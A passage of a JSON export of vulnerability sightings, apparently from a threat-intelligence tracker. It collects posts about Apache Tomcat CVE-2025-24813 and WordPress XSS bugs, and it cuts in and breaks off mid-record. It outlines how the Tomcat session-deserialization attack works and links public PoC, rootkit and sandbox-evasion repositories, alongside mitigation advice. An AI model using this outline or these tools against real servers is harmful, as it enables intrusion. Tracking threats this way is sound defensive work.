\n\n\u25b6\ufe0f\u041d\u0435\u0431\u0435\u0437\u044b\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f Hunters International \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0438 \u0432 World Leaks \u2014 \u043f\u043b\u0430\u043d\u0438\u0440\u0443\u044e\u0442 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043e\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0447\u0438\u0441\u0442\u043e\u0439 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0445\u0432\u0430\u043b\u044f\u0442\u0441\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u25b6\ufe0f\u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0444\u0438\u0448\u0435\u0440\u043e\u0432 \u043f\u0440\u043e\u0447\u043d\u043e \u0432\u043e\u0448\u0451\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u2014 \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u044b \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 SVG-\u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u25b6\ufe0f\u0421\u0432\u0435\u0436\u0443\u044e CVE-2025-24813 \u0432 Apache Tomcat \u0443\u0436\u0435 \u0432\u0437\u044f\u043b\u0438 \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b. \n\n\u25b6\ufe0f\u0410 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Jinx-0126 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0432\u043e\u0435 \u0412\u041f\u041e CPU_HU \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0411\u0414 PostgresSQL.\n\n\u25b6\ufe0f\u0412\u044b \u043d\u0435 \u043f\u043e\u0432\u0435\u0440\u0438\u0442\u0435, \u043d\u043e Ivanti \u0441\u043d\u043e\u0432\u0430 \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0438\u0437\u0434\u0435\u043b\u0438\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0441\u043d\u043e\u0432\u0430 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0437 UNC5521.\n\n\u25b6\ufe0f\u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u043e\u0431\u0437\u043e\u0440 \u0442\u0440\u0435\u043d\u0434\u043e\u0432 \u00ab\u043a\u0432\u0438\u0448\u0438\u043d\u0433\u0430\u00bb, \u0442\u043e \u0435\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c QR-\u043a\u043e\u0434\u043e\u0432. \u041c\u043d\u043e\u0433\u0438\u0435 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0440\u0435\u0437\u043a\u0438\u0439 \u0440\u043e\u0441\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0442\u0430\u043a\u0442\u0438\u043a\u0438.\n\n\u25b6\ufe0f\u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u043e\u0432\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0434\u043b\u044f Linux, Autocolor.\n\n\u25b6\ufe0f\u041d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u043c \u0440\u044b\u043d\u043a\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u0441\u043b\u0443\u0447\u0430\u0438 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u043e\u0432, \u0443\u0436\u0435 \u0441 \u0437\u0430\u0432\u043e\u0434\u0430 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 Android-\u0442\u0440\u043e\u044f\u043d\u0446\u0435\u043c Triada. \u0417\u043b\u043e\u0432\u0440\u0435\u0434 \u043a\u0440\u0430\u0434\u0451\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u0443, \u0443\u0447\u0451\u0442\u043a\u0438 \u0432 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u0430\u0445, \u0438 \u043c\u043d\u043e\u0433\u043e\u0435 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n#APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #\u043d\u043e\u0432\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2025-04-07T09:30:27.000000Z"}, {"uuid": "e4183546-7c2b-4786-b3cd-dbacea02a9d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/kasperskyb2b/1662", "content": "\ud83d\udc31 \u041e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e.\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434 CVE-2025-24813 \u0432 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 9, 10 \u0438 11 \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c PoC. \u0410\u0442\u0430\u043a\u0430 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 Tomcat \u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0447\u0430\u0441\u0442\u0435\u0439: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u043e\u043c PUT \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0441\u0441\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Java, \u0430 \u0437\u0430\u0442\u0435\u043c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e GET, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044f \u0432 \u043a\u0443\u043a\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0435\u0437 \u0432\u0441\u044f\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043e\u0441\u0442\u0438\u0436\u0438\u043c\u0430 RCE \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u044b\u0442\u0435\u043a\u0430\u044e\u0449\u0438\u043c\u0438 \u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c\u0438. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u2014 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043e \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445, \u043d\u043e \u044d\u0442\u043e \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u0438\u0437\u0431\u0435\u0436\u043d\u044b.  \u0411\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u044b \u0437\u0434\u0435\u0441\u044c.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f Apache, \u0430 \u0441 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e PoC \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 Tomcat \u0441\u0442\u0430\u043b\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c\u044e. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0430 \u0437\u0430\u043f\u0438\u0441\u044c \u0434\u043b\u044f \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u043e\u0432 (\u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 readonly \u0432 conf/web.xml) \u0438\u043b\u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c  \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0439 PUT  (allowPartialPut=false).\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2025-03-18T13:37:26.000000Z"}, {"uuid": "807006c6-146a-4351-8357-563b2e431a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "seen", "source": "https://t.me/cvedetector/21247", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-2481 - WordPress MediaView Reflected Cross-Site Scripting\", \n  \"Content\": \"CVE ID : CVE-2025-2481 \nPublished : March 27, 2025, 2:15 a.m. | 41\u00a0minutes ago \nDescription : The MediaView plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id' parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. \nSeverity: 6.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-27T04:06:45.000000Z"}, {"uuid": "13f55dc0-0cf3-429e-adb4-731f1362a147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24810", "type": "seen", "source": "https://t.me/cvedetector/16583", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24810 - Simple Image Sizes Cross-Site Scripting Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24810 \nPublished : Jan. 28, 2025, 5:15 a.m. | 1\u00a0hour, 55\u00a0minutes ago \nDescription : Cross-site scripting vulnerability exists in Simple Image Sizes 3.2.3 and earlier. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in to the product with the administrative privilege and accessing the settings screen. \nSeverity: 4.8 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-28T08:45:36.000000Z"}, {"uuid": "bb696e8f-3d8a-4ae9-ab3a-bc7b9f2f4e1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cibsecurity/83770", "content": "\ud83e\udd85 CERT NZ Shares Critical Advisory for CVE-2025-24813 Vulnerability in Apache Tomcat \ud83e\udd85\n\nCyble Cyble CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat \" dataimagecaption\"Cyble Cyble CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat \" datamediumfile\"httpscyble.comwpcontentuploads202503CybleBlogsCVE2025248131300x150.png\" datalargefile\"httpscyble.comwpcontentuploads202503CybleBlogsCVE20252481311024x512.png\" title\"CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat 2\"  Overview     The New Zealand Computer Emergency Response Team CERT NZ recently issued an urgent security advisory regarding a critical vulnerability, CVE202524813, affecting Apache Tomcat across multiple versions. This Apache Tomcat vulnerability, identified in March 2025, poses severe risks, including remote code execution...\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"CYBLE\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2025-03-19T15:02:47.000000Z"}, {"uuid": "51869a42-871a-4258-85f9-2a557dee382c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/TengkorakCyberCrewzz/29156", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "cc986916-5253-414a-9412-63101678dfc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/AzPQc8BypPug0v3haYvH4n5j-0vLxsu-ng01TlwKe66ObjQ", "content": "", "creation_timestamp": "2025-03-28T22:00:05.000000Z"}, {"uuid": "45fd1199-937c-4617-a012-e6c977d80829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/MKbDAY2Rgx9FRJ10NVo62t2l6PAL1hhNybr5tRYKNVVonWg", "content": "", "creation_timestamp": "2025-04-13T05:00:06.000000Z"}, {"uuid": "e09cd90a-e962-4cf2-857b-02ed7aea308e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/9k_C5JXeLGhpcgGl3TlsIBGRr_8CSnsQH8RurvDjcthq00c", "content": "", "creation_timestamp": "2025-04-11T17:00:09.000000Z"}, {"uuid": "56be7dc0-25de-41a3-95dd-aa892bf04012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "Telegram/rAeyD7D6HgocNYc-U7GyKkj8C7VgFQCEihp4zTkf006zaZ0", "content": "", "creation_timestamp": "2025-02-11T12:32:30.000000Z"}, {"uuid": "c722fbf7-54a2-43b1-bba2-962fad621c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "Telegram/BkI8lfCRShQowiA0d9GGinr9C2tBZI36Eb8PwcKDWqqWEbM", "content": "", "creation_timestamp": "2025-02-11T12:32:31.000000Z"}, {"uuid": "e3425382-8827-41ea-ba1d-890ca68f761d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/pWd9X9O-wxNFHc7yjrFxacF5_Xwtq-UoHUpwNipx7ufI6ko", "content": "", "creation_timestamp": "2025-03-14T10:00:06.000000Z"}, {"uuid": "a45fc799-bbc4-4b2c-954c-36b1fbc6df70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ZpVAfw2CiVb5XMhEA9ntELCWH_8t6W6x35utQuuSR7npxQQ", "content": "", "creation_timestamp": "2025-04-08T05:00:07.000000Z"}, {"uuid": "84629a4b-332a-4b5d-84ba-e48633201f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/I7jR8-nuB9vORcoqYQEKVbRbgCypJUG-yRbHBYfDVMuFag4", "content": "", "creation_timestamp": "2025-03-18T16:00:16.000000Z"}, {"uuid": "7470178f-62b9-4ddf-bbba-d78a8374c028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/MOyk5MLPuIFPQS1mjI720DgTYnW-ICPm73rDvqyoUuMx8VY", "content": "", "creation_timestamp": "2025-03-18T16:00:09.000000Z"}, {"uuid": "3cd4c50b-4490-4e45-911e-0b48e4527154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/CbtgHq16D2WzZv5CTdyVvXDcyFh0C0J5JL3g7K1HrWQaRx0", "content": "", "creation_timestamp": "2025-03-22T04:00:07.000000Z"}, {"uuid": "1211b2c7-10b6-4a77-9ac3-954bc2fc1459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/PwwJAzTb-IdG19a4lkKUuUkLQSIKKrHtPLjHlAbBLV6HlJc", "content": "", "creation_timestamp": "2025-03-25T04:00:08.000000Z"}, {"uuid": "916a6854-3657-4f49-9d2d-b0fbab62c565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/0GfCOzXtqvFdrqIAVQZHiIyuC3I1uZNIHuukwGa3RPYAk8Y", "content": "", "creation_timestamp": "2025-03-24T22:00:08.000000Z"}, {"uuid": "111b656e-8a2c-4c82-b02f-23021cf6f215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/b9uKhD1fwBkinGCQMJCbbfFx-Z3RPQ1IsiIIeMCJfCBemDM", "content": "", "creation_timestamp": "2025-03-18T04:00:07.000000Z"}, {"uuid": "608708f4-375b-4e70-a4b3-7c99b6ba6bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/YBrr9bnrMsHvjVMlNhE_R_T9Bu1Hec2ynwQC5xZi-avV8gw", "content": "", "creation_timestamp": "2025-03-20T04:00:07.000000Z"}, {"uuid": "6cb90c38-4fa9-45a2-9b50-8633002db3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8080", "content": "#GitHub #Tools\n\nPublic malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.\n\nhttps://github.com/ayoubfaouzi/al-khaser\n\nFileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.\n\nhttps://github.com/bytecode77/r77-rootkit\n\nApache Tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6279\u91cf\u68c0\u6d4b\u811a\u672c(CVE-2025-24813)\n\nhttps://github.com/iSee857/CVE-2025-24813-PoC\n\nCRADLE is a collaborative platform for Cyber Threat Intelligence analysts. It streamlines threat investigations with integrated note-taking, automated data linking, interactive visualizations, and robust access control. Enhance your CTI workflow from analysis to reporting\u2014all in one secure space.\n\nhttps://github.com/prodaft/cradle\n\n#HackersFactory", "creation_timestamp": "2025-03-19T10:09:01.000000Z"}, {"uuid": "788a3e51-1b22-4d39-9463-5541abcac7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/xakep_ru/17254", "content": "\u0421\u0432\u0435\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u0443\u0436\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u043c\n\n\u0414\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (RCE) \u0432 Apache Tomcat, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2025-24813, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442, \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439, \u043a\u0430\u043a \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 PUT. \u0418\u0437-\u0437\u0430 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\n\nhttps://xakep.ru/2025/03/18/apache-tomcat-rce-attacks/", "creation_timestamp": "2025-03-18T15:39:13.000000Z"}, {"uuid": "2a96704d-5f62-4ea2-b3e1-f3977b1d7069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113899504566639981", "content": "", "creation_timestamp": "2025-01-27T09:01:55.136656Z"}, {"uuid": "10696b60-3246-4e99-9950-d7b329c5e124", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgpm4gwnbq2f", "content": "", "creation_timestamp": "2025-01-27T09:15:35.196963Z"}, {"uuid": "8523468f-113a-4ea4-a7b0-08707243d0f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24810", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgsjg4vhh42e", "content": "", "creation_timestamp": "2025-01-28T13:05:18.933922Z"}, {"uuid": "507aed0f-9c8b-4519-b901-91e2c1fefddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3llnz5hx6sxk2", "content": "", "creation_timestamp": 